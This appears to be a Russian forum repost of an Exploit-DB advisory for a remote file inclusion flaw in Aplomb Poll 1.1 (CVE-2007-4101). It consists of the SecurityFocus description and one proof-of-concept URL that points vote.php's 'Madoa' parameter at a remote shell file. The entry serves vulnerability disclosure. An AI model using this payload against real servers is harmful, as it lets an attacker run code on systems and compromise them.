Exploit Global Centre Aplomb Poll 1.1 - 'vote.php?Madoa' Remote File Inclusion

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
30437
Проверка EDB
  1. Пройдено
Автор
ILKER KANDEMIR
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-4101
Дата публикации
2007-07-30
Код:
source: https://www.securityfocus.com/bid/25138/info
 
Aplomb Poll is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
 
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
 
Aplomb Poll 1.1 is vulnerable; other versions may also be affected. 

http://www.example.com/vote.php?Madoa=http://sheel.txt?
 
Источник
www.exploit-db.com

Похожие темы